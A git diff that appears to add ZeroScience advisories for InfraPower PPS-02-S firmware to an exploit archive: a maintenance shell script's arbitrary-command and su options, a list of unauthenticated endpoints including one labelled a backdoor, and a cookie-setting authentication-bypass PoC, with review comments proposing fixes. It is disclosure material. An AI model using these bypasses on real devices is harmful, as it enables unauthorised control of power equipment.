+echo "(B) Restore Box Configuration(box_conf) "
+echo -n "Are you sure to continue? [y/n]:"
+read ans8
+if [ "$ans8" == "y" ]; then
+if [ -f "/etc/box_conf" ]; then
+echo "Patching /mnt/mtd/box_conf..."
+cp /etc/box_conf /mnt/mtd/box_conf
+if [ -f "/mnt/mtd/box_conf" ]; then
+echo "Patching /mnt/mtd/box_conf...done"
+else
+echo "Patching /mnt/mtd/box_conf...failed"
+fi
+else
+echo "file not exist: /etc/box_conf"
+fi
+fi
+;;
+"P")
+INFRA_VER=`cat /etc/infratype_conf | grep "InfraType" | cut -d " " -f 2 | sed -e 's/^[ \t]*//' | sed -e 's/[ /t]*$//' | cut -d " " -f1`
+echo "(P) Restore INI, POL profiles for $INFRA_VER "
+echo -n "Are you sure to continue? [y/n]:"
+read ansP
+if [ "$ansP" == "y" ]; then
+if [ "$InfraType" == "1" ]; then
+echo "Restoring INI, POL profiles for $INFRA_VER..."
+if [ -f "/etc/MF2_ini_$INFRA_VER" ]; then
+echo -n "Found /etc/MF2_ini_$INFRA_VER, Restoring..."
+cp /etc/MF2_ini_$INFRA_VER /mnt/mtd/MF2_ini
+echo "...done"
+fi
+if [ -f "/etc/MF2_pol_$INFRA_VER" ]; then
+echo -n "Found /etc/MF2_pol_$INFRA_VER, Restoring..."
+cp /etc/MF2_pol_$INFRA_VER /mnt/mtd/MF2_pol
+echo "...done"
+fi
+if [ -f "/etc/PDU3_ini_$INFRA_VER" ]; then
+echo -n "Found /etc/PDU3_ini_$INFRA_VER, Restoring..."
+cp /etc/PDU3_ini_$INFRA_VER /mnt/mtd/PDU3_ini
+echo "...done"
+fi
+if [ -f "/etc/PDU3_pol_$INFRA_VER" ]; then
+echo -n "Found /etc/PDU3_pol_$INFRA_VER, Restoring..."
+cp /etc/PDU3_pol_$INFRA_VER /mnt/mtd/PDU3_pol
+echo "...done"
+fi
+if [ -f "/etc/FAN2_ini_$INFRA_VER" ]; then
+echo -n "Found /etc/FAN2_ini_$INFRA_VER, Restoring..."
+cp /etc/FAN2_ini_$INFRA_VER /mnt/mtd/FAN2_ini
+echo "...done"
+fi
+if [ -f "/etc/FAN2_pol_$INFRA_VER" ]; then
+echo -n "Found /etc/FAN2_pol_$INFRA_VER, Restoring..."
+cp /etc/FAN2_pol_$INFRA_VER /mnt/mtd/FAN2_pol
+echo "...done"
+fi
+if [ -f "/etc/HANDLE3_ini_$INFRA_VER" ]; then
+echo -n "Found /etc/HANDLE3_ini_$INFRA_VER, Restoring..."
+cp /etc/HANDLE3_ini_$INFRA_VER /mnt/mtd/HANDLE3_ini
+echo "...done"
+fi
+if [ -f "/etc/HANDLE3_pol_$INFRA_VER" ]; then
+echo -n "Found /etc/HANDLE3_pol_$INFRA_VER, Restoring..."
+cp /etc/HANDLE3_pol_$INFRA_VER /mnt/mtd/HANDLE3_pol
+echo "...done"
+fi
+fi
+fi
+;;
+"E")
+echo -n "Input command line:"
+read cmd_line
+$cmd_line
+;;
+"M")
+if [ -f "/mnt/mtd/log_memCheck.txt" ]; then
+cat /mnt/mtd/log_memCheck.txt
+fi
+;;
+"R")
+echo "(R) Reboot "
+echo -n "Are you sure to continue? [y/n]:"
+read ansR
+if [ "$ansR" == "y" ]; then
+echo "Rebooting..."
+reboot
+fi
+;;
+"X")
+echo "su mode started!"
+su
+;;
+"Q")
+echo "Leaving maintenance mode........OK"
+exit 0
+;;
+esac
+done
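Review bot: The quoted ListFile.php lines 9-10 concatenate `$_GET['file']` onto `/ramdisk/` with no canonicalisation, and the advisory stops at "not properly verified" without stating the check that is missing. The fix worth recording is to resolve the path and confirm it stays under the base directory before opening it: `$p = realpath('/ramdisk/' . $_GET['file']);` then `if ($p === false || strpos($p, '/ramdisk/') !== 0) { exit; }` (assuming `/ramdisk` is not itself a symlink). The excerpt also never checks the `fopen()` result, so a missing file leaves `feof()` looping on `false`. Because the sample output includes account password hashes, web and PDU passwords and the fixed strings compared in maintenance_shell.sh, the advisory should tell operators to treat those credentials as exposed and change them in addition to moving to the listed fixed firmware; whether Q216V3 changes the built-in strings is not shown here.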
diff --git a/platforms/php/webapps/40644.txt b/platforms/php/webapps/40644.txt
new file mode 100755
index 000000000..c200cf1f2
--- /dev/null
+++ b/platforms/php/webapps/40644.txt
@@ -0,0 +1,54 @@
+InfraPower PPS-02-S Q213V1 Insecure Direct Object Reference Authorization Bypass
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: Insecure Direct Object References occur when an application
+provides direct access to objects based on user-supplied input. As
+a result of this vulnerability attackers can bypass authorization
+and access resources and functionalities in the system directly, for
+example APIs, files, upload utilities, device settings, etc.
+
+Tested on: Linux 2.6.28 (armv5tel)
+ lighttpd/1.4.30-devel-1321
+ PHP/5.3.9
+ SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5373
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5373.php
+
+
+27.09.2016
+
+--
+
+
+GET /ConnPort.php
+GET /CSSSource.php
+GET /dball.php
+GET /doupgrate.php
+GET /IPSettings.php
+GET /ListFile.php
+GET /Menu.php
+GET /Ntp.php
+GET /PDUDetails_Ajax_Details.php
+GET /PDULog.php
+GET /PortSettings.php
+GET /production_test1.php ("backdoor")
+GET /UploadEXE.php
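Review bot: The Desc paragraph is a generic definition of insecure direct object references, but the list that follows is a set of scripts reachable without a login check, which is missing authentication (forced browsing) rather than object-reference tampering. None of the listed scripts appears among the `checkLogin` callers in the grep output of 40645.txt from this same commit, which supports that reading. I would add one line stating the condition and the fix, e.g. `These scripts never call checkLogin(); enforce the session check in one shared include loaded by every script, and drop production_test1.php from production firmware if it is factory test tooling.` The bare `GET` lines also give no expected response, so a reader cannot tell what distinguishes an affected device from a patched one.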
diff --git a/platforms/php/webapps/40645.txt b/platforms/php/webapps/40645.txt
new file mode 100755
index 000000000..af27bb43b
--- /dev/null
+++ b/platforms/php/webapps/40645.txt
@@ -0,0 +1,142 @@
+InfraPower PPS-02-S Q213V1 Authentication Bypass Vulnerability
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: The device does not properly perform authentication, allowing
+it to be bypassed through cookie manipulation. The vulnerable function
+checkLogin() in 'Function.php' checks only if the 'Login' Cookie is empty
+or not, allowing easy bypass of the user security mechanisms.
+
+Tested on: Linux 2.6.28 (armv5tel)
+ lighttpd/1.4.30-devel-1321
+ PHP/5.3.9
+ SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5374
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5374.php
+
+
+27.09.2016
+
+--
+
+
+(example) System.php:
+---------------------
+1: init($_SESSION['ite']);
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:156: if(empty($_SESSION['Login']))
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:233: if(!isset($_SESSION['TimeSync'])){
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:234: $_SESSION['TimeSync'] = getConf("/mnt/mtd/main_conf", "TimeSyncPDU_opt");
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:235: if($_SESSION['TimeSync'] == "ON"){
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:237: $_SESSION['SyncDate'] = explode(":",$SyncDate);
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:239: $_SESSION['TimeSync'] = "OFF";
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:240: $_SESSION['SyncDate'][0] = "0";
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:241: $_SESSION['SyncDate'][1] = "0";
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:255: unset($_SESSION['Login']);
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:265: unset($_SESSION['Login']);
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:31: $_SESSION['ite'] = substr($this->InfraType,1,1); // e.g."t3v3" get the second chr 3;
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:64: $_SESSION['ite'] = "1";
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:67: $_SESSION['ite'] = "2";
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:70: $_SESSION['ite'] = "3";
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:73: $_SESSION['ite'] = "3";
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:76: $_SESSION['ite'] = "3";
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:79: $_SESSION['ite'] = "4";
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:82: $_SESSION['ite'] = FALSE;
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:91:$_SESSION['ite'] = $InfraType;
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:137: $_SESSION['Login'] = $_POST['ID_User'];
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:140: $_SESSION['Login'] = $_POST['ID_User'];
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:156: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:167: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
+/Users/liwomac/Desktop/infrapower_files/www/Logout.php:3: $_SESSION['Login'];
+/Users/liwomac/Desktop/infrapower_files/www/Logout.php:4: if (isset($_SESSION['Login'])){
+/Users/liwomac/Desktop/infrapower_files/www/Logout.php:5: unset($_SESSION['Login']);
+/Users/liwomac/Desktop/infrapower_files/www/Menu.php:60: /*if ($_SESSION["SS_SystemCreated"] == "1") {
+/Users/liwomac/Desktop/infrapower_files/www/System.php:52: unset($_SESSION['Login']);
+/Users/liwomac/Desktop/infrapower_files/www/System.php:62: unset($_SESSION['Login']);
+
+➜ www grep -rHn 'checkLogin' /Users/liwomac/Desktop/infrapower_files/www
+/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:4: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/Function.php:155: function checkLogin(){
+/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:4: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/Login.php:165: if(checkLogin()) {
+/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:4: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:4: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:4: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:10: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:4: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:4: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:4: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:4: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/System.php:5: if(!checkLogin())
+/Users/liwomac/Desktop/infrapower_files/www/User.php:4: if(!checkLogin())
+
+
+PoC:
+
+javascript:document.cookie="Login=StrangerThings;expires=Sat, 09 Dec 2017 11:05:17 GMT"
+
+--
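Review bot: The Desc says checkLogin() tests the 'Login' cookie, yet the only evidence shown is `if(empty($_SESSION['Login']))` at Function.php:156, and the PoC sets a browser cookie named Login; nothing in the listing shows how a client cookie becomes a `$_SESSION` entry. The body of checkLogin() and whatever populates `$_SESSION` (the `init(...)` call on System.php line 1 looks relevant, but that is a guess) should be quoted so the root cause can be checked. The remediation is also missing: `Fix: keep login state only in the server-side session, bind it to an unguessable session id regenerated at login, and never derive it from a client-supplied cookie value.` The first grep listing has lost its command line, and both listings expose the researcher's local home path, which could be trimmed to paths relative to www/.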
diff --git a/platforms/php/webapps/40646.txt b/platforms/php/webapps/40646.txt
new file mode 100755
index 000000000..a38ac4923
--- /dev/null
+++ b/platforms/php/webapps/40646.txt
@@ -0,0 +1,53 @@
+InfraPower PPS-02-S Q213V1 Cross-Site Request Forgery
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: The application interface allows users to perform certain actions
+via HTTP requests without performing any validity checks to verify the
+requests. This can be exploited to perform certain actions with admin
+privileges if a logged-in user visits a malicious web site.
+
+Tested on: Linux 2.6.28 (armv5tel)
+ lighttpd/1.4.30-devel-1321
+ PHP/5.3.9
+ SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5375
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5375.php
+
+
+27.09.2016
+
+--
+
+
+PoC:
+
+
+